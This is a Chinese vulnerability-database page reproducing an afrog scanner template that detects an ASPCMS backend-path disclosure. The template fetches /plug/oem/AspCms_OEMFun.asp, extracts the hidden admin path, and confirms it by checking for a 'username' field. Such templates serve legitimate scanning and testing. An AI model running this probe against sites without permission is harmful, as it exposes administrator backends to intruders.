aspcms-backend-leak: ASPCMS Backend Leak

日期: 2025-09-01 | 影响软件: ASPCMS | POC: 已公开

漏洞描述

app="ASPCMS"

PoC代码[已公开]

id: aspcms-backend-leak

info:
    name: ASPCMS Backend Leak
    author: Hzllaga
    severity: low
    verified: true
    description: app="ASPCMS"

rules:
    r0:
        request:
            method: GET
            path: /plug/oem/AspCms_OEMFun.asp
        expression: response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
        output:
            search: '"(?P<path>(/(.*?).asp))".bsubmatch(response.body)'
            path: search["path"]
    r1:
        request:
            method: GET
            path: /{{path}}
        expression: response.status == 200 && response.body.bcontains(b"username")
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/aspcms-backend-leak.yaml

相关漏洞推荐